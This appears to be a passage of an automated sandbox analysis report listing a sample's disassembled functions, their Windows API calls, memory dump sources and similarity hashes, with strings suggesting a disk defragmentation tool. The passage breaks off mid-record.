                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                    • Instruction ID: d31ef5bb5228e6c3ad645c8f3d1319e11389829958ef149dbed2cab14c92e82a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b2ef0f21c238e92dbe494a8f0535b867e123380ff90faf569da88cc72c8f9fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15316F722087059FC310CF58C880B5BB7E8EF88718F104A2EF95997350DB79E909CB9A
                                                                                                                                                                                                                                                                                    Function 00410560 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                    • Instruction ID: ce4c3b2ba86c6f6c119685c1f909f4ca062621dcfedb5de8325838dac45ff1a4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57304bb34f2a7c9d27d57c86e6bfdf64e083342261e5794d1aa935df15270c11
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2314071244305AFD204DF61CCC5FABB3E9EBC8748F048A0CF58957290D674EA468B65
                                                                                                                                                                                                                                                                                    Function 00454EF0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3839614884-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d3be8701daf285d51c64e253fdb0a8c1ca35a99fc3c88bc81763c7530e70c03f
                                                                                                                                                                                                                                                                                    • Instruction ID: 61ee5ff977679a68600c6b3ba5455a9d5faea7aa6e4a004e82da9cd24f1d17ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3be8701daf285d51c64e253fdb0a8c1ca35a99fc3c88bc81763c7530e70c03f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21D2B6608351AFC310DE59D880E6BBBE8EBD9305F00495DF8849B302D275EC458BB6
                                                                                                                                                                                                                                                                                    Function 00424850 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 80sleepCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                    • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                    • API String ID: 451317006-1228882529
                                                                                                                                                                                                                                                                                    • Opcode ID: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction ID: 2aae77fe05b5572fc9a22550ba8b2e73634bf3b6c40b7b563c05c91186231963
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6021D439B102224BD724DE68DD84BE73351DFC4325F5A4279ED098F382DB66EC468299
                                                                                                                                                                                                                                                                                    Function 00463530 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction ID: 72788d8031d8da8ebdf27af98cafe7d3eb32084a5d4fa9d01f0a72895e77951c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711C4716003412BE3109B169C46BAB769CEBD1710F44483EF548E6151EAA8EA098BEF
                                                                                                                                                                                                                                                                                    Function 005FDE91 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005FDEAD
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005FDEC6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 968c789e47ac104a089a63a3d9a647db915dc32d09b6e71ab0484a4db3cd1788
                                                                                                                                                                                                                                                                                    • Instruction ID: fb580ab6c100dca722d1fa83e6dae7c11b726cf200d352632489135a9b477385
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 968c789e47ac104a089a63a3d9a647db915dc32d09b6e71ab0484a4db3cd1788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F13224831A6EB71426B56C8A97A3FBBFB52771720032AF714851F1EE294C019161
                                                                                                                                                                                                                                                                                    Function 00454FD0 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00454FE5
                                                                                                                                                                                                                                                                                    • __alldvrm.LIBCMT ref: 00454FF8
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045500B
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00455044
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm__allrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2089711351-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction ID: 1642b9dd75f3a4511d1f743995959062418e168b9dabd897861ea646df64c966
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44112AB5A00A00AFC324CF66C985D27BBE9EFC8714721C92EB59A87745D675FC40CB64
                                                                                                                                                                                                                                                                                    Function 0046D000 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                    • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction ID: d6e58a44651a1d3402cb24b8e4ad2f5d6b0251b9aafb2ead04931a23fc49c706
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E016771F142189FD730AF6AEC8096B37DCE756318F15083BE108D3211DA79A442877D
                                                                                                                                                                                                                                                                                    Function 00467680 Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                    • Instruction ID: 05ecc198b00069830d56908e8e3e5e7e1269b8f0e776762def572f81c0fca120
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF01D717C0B027AE2309A68DC82FA7A2A86B94B02F15582DF359FB1D196B875018E58
                                                                                                                                                                                                                                                                                    Function 00460400 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 353COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 89a6921c06f24090ffa03df58177ed7f9d03450d2280ec600551e15521660d28
                                                                                                                                                                                                                                                                                    • Instruction ID: d8bfd7cdfac141d9cfdb0ffece5a98f1ca78eb3dd6e2b02cd9253dc2d6ef05f2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89a6921c06f24090ffa03df58177ed7f9d03450d2280ec600551e15521660d28
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED137756083409FC314DF69C98092BFBE4BFC8314F05896EF99997311E739E8058BA6
                                                                                                                                                                                                                                                                                    Function 0045D2A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
